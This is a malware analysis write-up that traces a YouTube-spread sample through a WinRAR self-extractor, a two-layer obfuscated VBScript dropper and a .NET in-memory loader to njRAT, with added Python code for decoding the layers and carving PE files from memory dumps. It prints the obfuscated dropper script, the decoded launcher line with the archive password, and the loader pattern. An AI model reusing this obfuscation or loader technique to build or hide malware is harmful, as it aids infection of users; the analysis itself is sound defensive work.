README
If your antivirus detects this page as malicious, it is most probably because I have pasted some scripts into the article. Do not be alarmed!
Introduction
Very recently I’ve (finally) set up a proper malware analysis VM and so I thought that it would be super fun to download some samples from malware spreaders on YouTube. I came across something interesting from which I have learned and expanded my knowledge and so I thought I’d share my analytical journey with you guys in hopes that you will also learn something!
Required Skills
Nothing extraordinary; these are entirely optional and are not needed to follow the analysis.
- Visual Basic
- C# .NET
- Reverse engineering
- Forensics
- Persistence
- Common sense
Analysis
Static Analysis
VirusTotal - Firestorm.exe
With all things hacking, recon should be the first step towards understanding the target. The first thing I do is upload the sample to VirusTotal (VT) to see if this has already been detected or not, or just to try and get a general overview of what I might be dealing with.
Okay, so there are some detections, but they look pretty generic and don't really tell us much.
pestudio - Firestorm.exe
Since VT wasn’t helpful, I needed to get a better understanding of what this file is and what it can do. So, using pestudio, I may be able to get some hints.
We can see quite a few flags being raised, most notably:
- it attempts to appear as the Microsoft executable IEXPLORE.exe, i.e. Internet Explorer,
- it seems to have another file embedded within,
- it references file streams, so it may write to disk,
- it references cryptographic functions, which may indicate encryption or obfuscation of whatever is embedded,
- the debug file name is sfxrar.pdb, which indicates a self-extracting archive, most likely WinRAR.
If we go into the manifest, we can see that it tells us that it’s a WinRAR SFX:
File Extraction with WinRAR - Firestorm.exe
Let’s open up this archive in WinRAR and see what it contains:
On the right-hand side, we can see the SFX script, which details the path the files will be extracted to, the file to execute after unpacking, silent installation and file overwriting. Of course the file execution is what grabs our attention, so let's extract these files and have a look at them.
pestudio - sfx.exe
The file name sfx.exe gives us a pretty good clue as to what it might be, so let's confirm with pestudio:
Yes, as we expected. Can we extract it?
Unfortunately not. So let's continue with form1.vbe.
Deobfuscating Visual Basic - form1.vbe
Upon opening the file, this is what we see:
TZUO3TWPSQYCGRU="RewXÞíÖK<m«¡®¬ÅÈê7<UX´Ç¦½ÊÈá.PSXqt¥¸ÐãÂÙæ.GJlotozÇÒºìû.YJ{¦¹¯¼ºÓÖBEJcfªÂÕ´ËØÖ9<^af³ÆÞñÐç><UXz}ÄÆÑèÈÃiy¦§ÄɺÊîA*[hwb¡´ÍÚÄFS8iwp¡®À¨àéMZlT
¡½ÊàÄ?LbFyp¦¯ÍÚÄFS8pyb©½ËÜÄ?L_Fw
~¯½Ð¶êD*`oT
¤½ÊÙÄGS8iwp¡®½¨ßïUbFw~¯¼Ë¶ïG*[i|b ¿Î¶îE*bkT~¯½Î¶ç>Q8iwp¡¯Â¨ÜìT]Fw~¯¼Ë¶ç>T8ivp£²ÎÙÄ?O8ivb§½ËÝÄ?L^F~p¡®À¨Ùæ?*[h~b ¶ÎÞÄFN8iwp¡¯¼¨ÛèO^Fw
~¯¼Ì¶ç@L8l|b ¯ËÚæMZiT~±¾¨ÜëM[jT~·À¨ÝìP]Fw
~´Á¨àèM[pT~¯½Ì¶îB*[ib§ÂÓ¶ìG*]mT~ ¤íĄR<s~S^ÏßæíČÈó.iy¦§ÄãîÖRaJufªÂÕ´ËØÖ9<^af³ÆÞñÐç><UXz}Ïâúč6MZXqtàâíĄ.)4
¯ÂÒ¬×Èĉ^hsnÁÑØßþÆëþ`sRivt²µÃÈÃax|f¨¤ñü.`oXt¥¸ÐãÂÙæ.GJlotÁÔìÿÞ?LJcf©¬ÝðĈeD[hf¤§¬îðû\<7BºÉáÜ÷ċ\`R
¯ÂÒµºÓÖ6<WX´Ç¦ÀÓÑß.)4~¦½Éºëþ`sRl~}ÄͬĎĝÃ`s
f§¦¤ûú.YJ¸|¯¿ÆÙìüÞ[ESXS^©¶Ò¬×ÈØu¬ÈÉäåĀĀĔĪu«ÆÉàô÷[eJuf®±ËÕºÓÖa`JEP¢§ÈÒ¬§²úWiJ{´¶Ð¬§²ûfamÄØÛõÿ7<7B¦ÂÄÞºåÖQd|n
©¬ÎÑÖ9<m«¡®¬ÅÈê7<UX´Ç¦½ÊÈá.PSXqtÑô¹üġĘoZfalµÌкñü.<7B¬ÉÐÓòõĉĖÖrR¦»}}ÿČÈó._r|Ð姤ČĨ.YJ«¸alµÌкîċ\_~¢}¤" : PZUO3TWPSQYCGRU="ZUO3TWPSQYCGRU" : CZUO3TWPSQYCGRU=len(PZUO3TWPSQYCGRU) : do until NZUO3TWPSQYCGRU=len(TZUO3TWPSQYCGRU) : NZUO3TWPSQYCGRU=NZUO3TWPSQYCGRU+1 : UZUO3TWPSQYCGRU=UZUO3TWPSQYCGRU+1 : if UZUO3TWPSQYCGRU=len(PZUO3TWPSQYCGRU) then UZUO3TWPSQYCGRU=1
WZUO3TWPSQYCGRU=WZUO3TWPSQYCGRU & ChrW(AscW(Mid(TZUO3TWPSQYCGRU, NZUO3TWPSQYCGRU, 1)) - UZUO3TWPSQYCGRU * CZUO3TWPSQYCGRU) : loop : execute WZUO3TWPSQYCGRU
and what a mess it is. Obfuscation of scripts is very common, so this should not come as a surprise. The problem for us is to deobfuscate it somehow. We can see a long string, which presumably holds another payload once decoded, and a handful of function calls, but it is still confusing and could take some time to reverse engineer, especially for those of us who are not familiar with Visual Basic.
What's a simple way to continue without too much effort? At the end of the script we see an execute call on the WZUO3TWPSQYCGRU variable, i.e. the decoded text is run as code. So let's be smart here: instead of letting it execute, we make it write the decoded contents out. After a quick Google search, it seems we just need to replace execute with WScript.Echo, then run the script with cscript.exe and redirect its output to a file (important! with wscript.exe the output pops up as a message box instead). Here is the output:
(The following script has sections removed to prevent AV detection)
DIM DF
MOHMRET = "83101116328711510483104101108108326132878399114105112116466711410197116101799810610199116403487839911410511211646831041011081083441131087115104831041011081084682117110323411510212-04610112010132324511284945643110658211869112841198769693534"
END IF
mohar = MOHMRET
MOHMRT = SPLIT(mohar,CHRW(10 + 4))
END IF
EXECUTE (FLAMI)
END IF
Yes, indeed it is another payload. Again it is obfuscated, but this time it makes a bit more sense. Another potential payload is held in the MOHMRET variable, which looks like a run of ASCII character codes with some separator character woven in. The split function is applied to mohar (a copy of MOHMRET) with the character 10 + 4, i.e. ChrW(14), which fits that assumption: split on the separator, turn each number back into a character, and execute the result.
Instead of deobfuscating this file by hand, let's be smart again and, as with the previous script, replace execute with WScript.Echo and see what we get:
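Patching execute into WScript.Echo is the quick route, but both decoding steps are simple enough to re-implement, which lets you recover the next stage without running any of the script. The following is an added example, not code from the original post: it mirrors the layer-1 loop exactly as posted (key ZUO3TWPSQYCGRU, shift of U * len(key) with U wrapping at len(key)) and the layer-2 scheme inferred from the visible numbers (decimal character codes joined by ChrW(14); the first codes 83 101 116 32 spell "Set "). The first three characters of the posted string, "Rew", decode to the "DIM" that opens stage 2, which is a handy sanity check; the round-trip demo uses a constructed stage-2 line, since the non-printable separators do not survive a forum paste.

```python
# Added example, not from the original post: offline re-implementation of the
# two decoding layers seen in form1.vbe, so the next stage can be recovered
# without executing the script.

KEY = "ZUO3TWPSQYCGRU"   # the PZUO3TWPSQYCGRU value in the posted script
SEP = chr(10 + 4)        # CHRW(10 + 4) used by SPLIT() in stage 2


def decode_layer1(encoded: str, key: str = KEY) -> str:
    """Mirror of the VBScript loop:

        do until N = len(T) : N = N + 1 : U = U + 1
            if U = len(P) then U = 1
            W = W & ChrW(AscW(Mid(T, N, 1)) - U * len(P))
        loop : execute W

    U counts 1 .. len(key)-1 and wraps (it never reaches len(key));
    each character is shifted down by U * len(key).
    """
    c = len(key)
    u = 0
    out = []
    for ch in encoded:
        u += 1
        if u == c:
            u = 1
        out.append(chr(ord(ch) - u * c))
    return "".join(out)


def encode_layer1(plain: str, key: str = KEY) -> str:
    """Inverse of decode_layer1, only needed to build a test vector."""
    c = len(key)
    u = 0
    out = []
    for ch in plain:
        u += 1
        if u == c:
            u = 1
        out.append(chr(ord(ch) + u * c))
    return "".join(out)


def decode_layer2(encoded: str, sep: str = SEP) -> str:
    """Stage 2: MOHMRET is a list of decimal character codes joined by
    chr(14). SPLIT on the separator and map each code back through ChrW.
    (Assumption from the visible numbers: 83 101 116 32 ... is 'Set '.)"""
    return "".join(chr(int(tok)) for tok in encoded.split(sep) if tok)


def encode_layer2(plain: str, sep: str = SEP) -> str:
    """Inverse of decode_layer2, only needed to build a test vector."""
    return sep.join(str(ord(ch)) for ch in plain)


def roundtrip(stage2_plain: str) -> str:
    """Wrap a constructed stage-2 line in both layers and peel them off again.
    For brevity the code list is nested directly inside layer 1; in the real
    sample layer 1 yields a whole script that carries the list in MOHMRET."""
    stage1_plain = encode_layer2(stage2_plain)   # what 'execute W' would see
    blob = encode_layer1(stage1_plain)           # what sits in TZUO3TWPSQYCGRU
    return decode_layer2(decode_layer1(blob))


if __name__ == "__main__":
    # 'R','e','w' shifted by 14, 28, 42 give 'D','I','M': the start of stage 2.
    print(decode_layer1("Rew"))
    print(roundtrip('Set WshShell = WScript.CreateObject("WScript.Shell")'))
```

To apply it to the real sample, read the TZUO3TWPSQYCGRU literal out of form1.vbe with the file's own encoding (ChrW works on code points, so a mis-decoded byte shifts every character it touches) and pass it to decode_layer1; the result is the stage-2 script, whose MOHMRET literal then goes through decode_layer2.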
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "sfx.exe -pT^8+nARvEpTwWEE#"
There is no more obfuscation and we can see a reference to sfx.exe. The script launches the other file on the command line with what is most likely the password to the archive: a quick Google search confirms that WinRAR takes the command-line option -p as the password switch, with the password following it directly. With that, we have unlocked a piece of the puzzle.
Opening sfx.exe with the recovered password, we find yet another auto-run executable, eze.exe. Let's extract it and perform some more analysis.
pestudio - eze.exe
Looking at the indicators in pestudio, we can see that it masquerades as a Microsoft executable. We can also see that it is likely a .NET file, and the original name WindowsFormsApp1.exe tells us the project kept its default name when it was created, i.e. a C# Windows Forms project.
Moving onto the VT indicators (the sample must already exist on VT), we can see that it may be a dropper:
Let’s take a look at the strings since it might provide us with the file names of the file it may drop:
And quite some interesting strings we have here. Greetings, Mr. Stan! If you are reading this, you are violating rule number 5 of the CIA's Development Tradecraft DOs and DON'Ts. Here's the link, just for you! Don't be surprised if cops show up at the front of your door!
We can confirm the project was developed under Visual Studio 2017, as we suspected from the default project name. The string listed after it looks like the location from which the dropper obtains its payload. If we navigate to the page, we get an error:
So it seems the file is not a PNG at all, nor any other type of image file.
Dynamic Analysis
dnSpy - eze.exe
We would love to see the file that is dropped by this sample. Of course, it could easily be obtained just by downloading it from that URL, but to spice things up, let's look at how to get it via dynamic analysis. Open up eze.exe in dnSpy and let's see what it does.
In the red box, we can see a call to a very common method, Assembly.Load. Given a byte array, it loads a managed assembly into the current process without ever writing it to disk, and the EntryPoint.Invoke call that follows runs it; this is the standard in-memory loader pattern for .NET droppers and crypters. For an example of this, see @TheDoctor's [C#] A Simple Runtime Crypter article.
To get the binary file, we simply place a breakpoint on this line and run it until it gets hit (mind the sleep at the beginning!), then look at the memory of the array variable (right-click the variable in the Locals tab at the bottom, select Show in Memory Window and choose a memory view). There lies the binary we were looking for! Identify the MZ magic at the start and the PE\0\0 signature at the offset held in e_lfanew (the DWORD at offset 0x3C) to verify it is a PE file. Right-click the memory and select Save Selection... to dump it.
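Eyeballing MZ and PE\0\0 in the hex view tells you a PE is there, but not where it ends, and Save Selection... only saves what you highlighted. The following is an added example, not code from the original post: it scans a saved memory region for MZ candidates, validates each through e_lfanew and the PE signature, sizes the image from its section table (the byte array handed to Assembly.Load is in file layout, so PointerToRawData applies; a mapped image would need VirtualAddress instead), and checks data directory 14, the CLR runtime header, to tell a .NET payload from a native one. The PE it carves in the demo is a constructed minimal PE32 embedded in junk, not the sample's payload.

```python
import struct

# Added example, not from the original post: carve a PE image out of a raw
# memory dump and report whether it is a managed (.NET) image.


def _parse_pe(blob: bytes, base: int):
    """Validate a candidate 'MZ' at blob[base:] and work out its extent."""
    if base + 0x40 > len(blob):
        return None
    e_lfanew, = struct.unpack_from("<I", blob, base + 0x3C)
    pe = base + e_lfanew
    if e_lfanew > 0x1000 or pe + 24 > len(blob) or blob[pe:pe + 4] != b"PE\0\0":
        return None
    nsec, = struct.unpack_from("<H", blob, pe + 6)
    opt_size, = struct.unpack_from("<H", blob, pe + 20)
    opt = pe + 24
    if opt + opt_size + nsec * 40 > len(blob):
        return None
    magic, = struct.unpack_from("<H", blob, opt)
    if magic == 0x10B:        # PE32: data directories start at +96
        dd = opt + 96
    elif magic == 0x20B:      # PE32+: data directories start at +112
        dd = opt + 112
    else:
        return None
    size_of_headers, = struct.unpack_from("<I", blob, opt + 60)
    # Data directory 14 is the CLR runtime header; non-zero => .NET image.
    clr_rva = clr_size = 0
    if dd + 15 * 8 <= opt + opt_size:
        clr_rva, clr_size = struct.unpack_from("<II", blob, dd + 14 * 8)
    # File layout: the image ends where the last section's raw data ends.
    end = size_of_headers
    sec = opt + opt_size
    for i in range(nsec):
        raw_size, raw_ptr = struct.unpack_from("<II", blob, sec + i * 40 + 16)
        end = max(end, raw_ptr + raw_size)
    return {
        "offset": base,
        "size": end,
        "data": blob[base:base + end],
        "is_dotnet": clr_rva != 0 and clr_size != 0,
        "truncated": base + end > len(blob),   # dump cut off mid-image
    }


def carve_pe(blob: bytes) -> list:
    """Return every 'MZ' in blob that is followed by a consistent PE header."""
    found = []
    pos = 0
    while True:
        mz = blob.find(b"MZ", pos)
        if mz == -1:
            return found
        pos = mz + 1
        info = _parse_pe(blob, mz)
        if info is not None:
            found.append(info)


def build_test_pe(managed: bool) -> bytes:
    """Constructed minimal PE32 (one section at file offset 0x200)."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                   # PE32 magic
    struct.pack_into("<I", opt, 60, 0x200)                  # SizeOfHeaders
    if managed:
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)   # CLR header
    sec = b".text\0\0\0" + struct.pack("<IIIIIIHHI", 0x100, 0x1000, 0x200, 0x200,
                                       0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + coff + bytes(opt) + sec).ljust(0x200, b"\0")
    return headers + bytes(range(256)) * 2                  # 0x200 bytes of "code"


if __name__ == "__main__":
    # Constructed dump: a stray 'MZ' false positive, the PE, then slack.
    dump = b"\x00" * 37 + b"MZ\0\0\0\0\0" + build_test_pe(managed=True) + b"\xcc" * 50
    for hit in carve_pe(dump):
        print(f"PE at {hit['offset']:#x}, {hit['size']:#x} bytes, "
              f".NET={hit['is_dotnet']}, truncated={hit['truncated']}")
```

In practice, save the whole memory window around the array rather than a hand-picked selection, run carve_pe over the file, and write out hit["data"]; a truncated hit means the dump stopped short of the last section and needs to be taken again with a larger range.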
Let’s see what VT has for us.
55/67 detections! Identified as Bladabindi, AKA njRAT.
Conclusions
I hope this was an entertaining and educational read! Thanks for stopping by!
EDIT:
The sample can now be obtained here:
– dtm